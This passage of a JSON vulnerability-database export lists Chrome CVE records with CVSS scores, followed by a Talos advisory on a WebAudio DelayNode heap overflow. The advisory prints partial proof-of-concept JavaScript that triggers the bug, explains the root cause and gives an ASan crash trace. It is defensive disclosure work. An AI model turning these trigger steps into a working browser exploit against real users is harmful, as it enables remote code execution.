"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:02", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21160", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-12-03T17:06:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-06T05:47:19", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "type": "cve", "title": "CVE-2019-13720", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": 
"2022-10-06T03:03:00", "cpe": ["cpe:/o:opensuse:leap:15.1"], "id": "CVE-2019-13720", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T14:22:47", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21166", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", 
"cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-25T22:05:12", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21164", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21163", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21162", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21161", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-09T18:15:00", "id": 
"DEBIANCVE:CVE-2021-21161", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21159", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21159", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21160", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:08", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T15:15:00", "type": "debiancve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-25T15:15:00", "id": "DEBIANCVE:CVE-2019-13720", "href": "https://security-tracker.debian.org/tracker/CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T22:05:12", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "debiancve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T18:15:00", "id": "DEBIANCVE:CVE-2021-21166", "href": 
"https://security-tracker.debian.org/tracker/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talos": [{"lastseen": "2022-01-26T11:42:21", "description": "### Summary\n\nAn exploitable heap-based buffer overflow vulnerability exists in the Google Chromium browser affecting at least versions 89.0.4383.0 64-bit and 90.0.4390.0 64-bit. A specially crafted HTML web page can cause a heap-based buffer overflow condition, resulting in remote code execution. The victim needs to visit a malicious web site to trigger the vulnerability.\n\n### Tested Versions\n\nGoogle Chrome ver 841401 ( 89.0.4383.0 64-bit) \nGoogle Chrome ver 844161 ( 90.0.4390.0 64-bit)\n\n### Product URLs\n\n<https://www.google.com/chrome/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-122 - Heap-based Buffer Overflow\n\n### Details\n\nGoogle Chrome is a cross-platform web browser developed by Google.\n\nTo understand the vulnerability, let us analyze some parts of the poc.html file and the corresponding lines logged to the browser console:\n \n \n \"Mutation nodes amount : 6\"\n \"[ 4:21:34 PM ] :: Connecting nodes\"\n \"[ 4:21:34 PM ] :: Nodes connected\"\n \"[ 4:21:34 PM ] :: MediaElementAudioSourceNode_handler\"\n \"[ 4:21:34 PM ] :: AudioContext_handler\"\n \"IIRFilterNode: state is bad, probably due to unstable filter.\"\n \n \"[ 4:21:34 PM ] :: ScriptProcessorNode_oncomplete\"\n \"[ 4:21:34 PM ] :: Index : 1\"\n \"[ 4:21:34 PM ] :: Connect IIRFilterNode to DelayNode.delayTime\"\n \n\nAs we can see, after the initialization phase of the PoC setup, the first events start to appear and are handled. 
Crucial actions for our PoC take place inside the `oncomplete` event handler named `ScriptProcessorNode_oncomplete` of the `ScriptProcessorNode` node:\n \n \n Line 42 var g_fuzzRandom_index = 0;\n Line 43\n Line 44 //events handlers\n Line 45 function ScriptProcessorNode_oncomplete()\n Line 46 {\n Line 47 writeLog(\"ScriptProcessorNode_oncomplete\");\n Line 48 \n Line 49 g_fuzzRandom_index++;\n Line 50 writeLog(\"Index : \" + g_fuzzRandom_index);\n Line 51\n Line 52\n Line 53 if(g_fuzzRandom_index == 1)\n Line 54 { \n Line 55 writeLog(\"Connect IIRFilterNode to DelayNode.delayTime\");\n Line 56 audioNodesObjects.mutation[4].obj.connect( audioNodesObjects.mutation[5].obj.delayTime ); \n Line 57 return;\n Line 58 }\n \n\nDuring the first execution of the `ScriptProcessorNode_oncomplete` event handler, the `IIRFilterNode` node is connected to an AudioParam object; in our case it is the `delayTime` field of the `DelayNode` object (`line 56`). That connection is required to trigger the vulnerability, but tests have shown that, besides `IIRFilterNode`, a different type of AudioNode can also be used to obtain the same result.\n\nWhen the `ScriptProcessorNode_oncomplete` handler is executed for a second time, the following lines will appear inside the log file:\n \n \n \"[ 4:21:35 PM ] :: ScriptProcessorNode_oncomplete\"\n \"[ 4:21:35 PM ] :: Index : 2\"\n \"[ 4:21:35 PM ] :: Switch delayTime of DelayNode to k-rate\"\n \n\nand the corresponding code is executed:\n \n \n Line 59\tif(g_fuzzRandom_index == 2)\n Line 60\t{ \n Line 61\t\t//DelayNode\n Line 62\t\twriteLog(\"Switch delayTime of DelayNode to k-rate\");\n Line 63\t\taudioNodesObjects.mutation[5].obj.delayTime.automationRate = \"k-rate\";\n Line 64\t\treturn;\n Line 65\t}\t \n \n\nThe crucial code is executed in `line 63`, where the value of the `automationRate` field is changed from `a-rate` to `k-rate`. 
More details about possible `AutomationRate` values are available here: https://www.w3.org/TR/webaudio/#dom-audioparam-automationrate\n\nThat switch during the processing phase (we are inside the oncomplete event handler) leads to the vulnerability inside the `blink::AudioDelayDSPKernel::ProcessKRate` method, located in the file `third_party\\blink\\renderer\\platform\\audio\\audio_delay_dsp_kernel.cc`. As you might notice when browsing the code around `blink::AudioDelayDSPKernel::ProcessKRate`, there is also a method responsible for data processing when the `automationRate` field is set to `a-rate`; it is called `AudioDelayDSPKernel::ProcessARate`. As I mentioned before, it seems that the runtime change from \u201ca-rate\u201d to \u201ck-rate\u201d during the processing phase leads to internal state confusion in the `DelayNode` object and finally to the vulnerability in:\n \n \n audio_delay_dsp_kernel.cc\n \n Line 276 // Now copy out the samples from the buffer, starting at the read pointer,\n Line 277 // carefully handling wrapping of the read pointer.\n Line 278 float* read_pointer = &buffer[read_index1];\n Line 279 \n Line 280 int remainder = buffer_end - read_pointer;\n Line 281 memcpy(sample1, read_pointer,\n Line 282 sizeof(*sample1) *\n Line 283 std::min(static_cast<int>(frames_to_process), remainder));\n \n\nThere is no check whether `buffer_end` is smaller than `read_pointer`, which in our case is exactly what happens. Further, in `line 281`, the smaller of `frames_to_process` and `remainder` is selected as the size parameter for `memcpy`. Because both variables are treated as signed integers, our `remainder` ends up being selected because its value is < 0. 
In the end it is cast to size_t (an unsigned value), which finally causes an attempt to copy a huge amount of memory.\n\nProper heap grooming can give an attacker full control of this heap overflow vulnerability and as a result could allow it to be turned into arbitrary code execution.\n\n### Crash Information\n \n \n =================================================================\n ==1076==ERROR: AddressSanitizer: negative-size-param: (size=-8589824196)\n \t#0 0x7ff74867402f in __asan_memcpy C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\llvm\\compiler-rt\\lib\\asan\\asan_interceptors_memintrinsics.cpp:22\n \t#1 0x7ffaf2dc9ab1 in blink::AudioDelayDSPKernel::ProcessKRate(float const *, float *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_delay_dsp_kernel.cc:281:3\n \t#2 0x7ffaf2dcf38c in blink::AudioDSPKernelProcessor::Process(class blink::AudioBus const *, class blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_dsp_kernel_processor.cc:85:20\n \t#3 0x7ffaf23dfbac in blink::AudioBasicProcessorHandler::Process(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_basic_processor_handler.cc:85:18\n \t#4 0x7ffaf0be1e26 in blink::AudioHandler::ProcessIfNecessary(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node.cc:368:7\n \t#5 0x7ffaf18a8f2c in blink::AudioNodeOutput::Pull(class blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_output.cc:137:13\n \t#6 0x7ffaf18abfe6 in blink::AudioNodeInput::SumAllConnections(class scoped_refptr<class blink::AudioBus>, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_input.cc:128:40\n \t#7 0x7ffaf18ac278 in blink::AudioNodeInput::Pull(class 
blink::AudioBus *, unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\audio_node_input.cc:158:3\n \t#8 0x7ffaf1953707 in blink::RealtimeAudioDestinationHandler::Render(class blink::AudioBus *, unsigned int, struct blink::AudioIOPosition const &, struct blink::AudioCallbackMetric const &) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\modules\\webaudio\\realtime_audio_destination_node.cc:207:18\n \t#9 0x7ffaf23c15a7 in blink::AudioDestination::RequestRender(unsigned __int64, unsigned __int64, double, double, unsigned __int64) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_destination.cc:251:17\n \t#10 0x7ffaf23c03f4 in blink::AudioDestination::Render(class blink::WebVector<float *> const &, unsigned __int64, double, double, unsigned __int64) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\blink\\renderer\\platform\\audio\\audio_destination.cc:194:5\n \t#11 0x7ffaedebee86 in content::RendererWebAudioDeviceImpl::Render(class base::TimeDelta, class base::TimeTicks, int, class media::AudioBus *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\content\\renderer\\media\\renderer_webaudiodevice_impl.cc:253:21\n \t#12 0x7ffada23aef4 in media::SilentSinkSuspender::Render(class base::TimeDelta, class base::TimeTicks, int, class media::AudioBus *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\base\\silent_sink_suspender.cc:84:14\n \t#13 0x7ffada171b16 in media::AudioOutputDeviceThreadCallback::Process(unsigned int) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\audio\\audio_output_device_thread_callback.cc:80:21\n \t#14 0x7ffada15810f in media::AudioDeviceThread::ThreadMain(void) C:\\b\\s\\w\\ir\\cache\\builder\\src\\media\\audio\\audio_device_thread.cc:95:18\n \t#15 0x7ffae1c7f18f in base::`anonymous namespace'::ThreadFunc C:\\b\\s\\w\\ir\\cache\\builder\\src\\base\\threading\\platform_thread_win.cc:111:13\n \t#16 0x7ff74867e3a8 in __asan::AsanThread::ThreadStart(unsigned 
__int64, struct __sanitizer::atomic_uintptr_t *) C:\\b\\s\\w\\ir\\cache\\builder\\src\\third_party\\llvm\\compiler-rt\\lib\\asan\\asan_thread.cpp:273\n \t#17 0x7ffba61a7c23 (C:\\WINDOWS\\System32\\KERNEL32.DLL+0x180017c23)\n \t#18 0x7ffba7ced4d0 (C:\\WINDOWS\\SYSTEM32\\ntdll.dll+0x18006d4d0)\n \n\n### Timeline\n\n2021-01-26 - Vendor Disclosure \n2021-02-09 - Vendor Patched \n2021-05-19 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-19T00:00:00", "type": "talos", "title": "Google Chrome AudioDelayDSPKernel::ProcessKRate heap-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 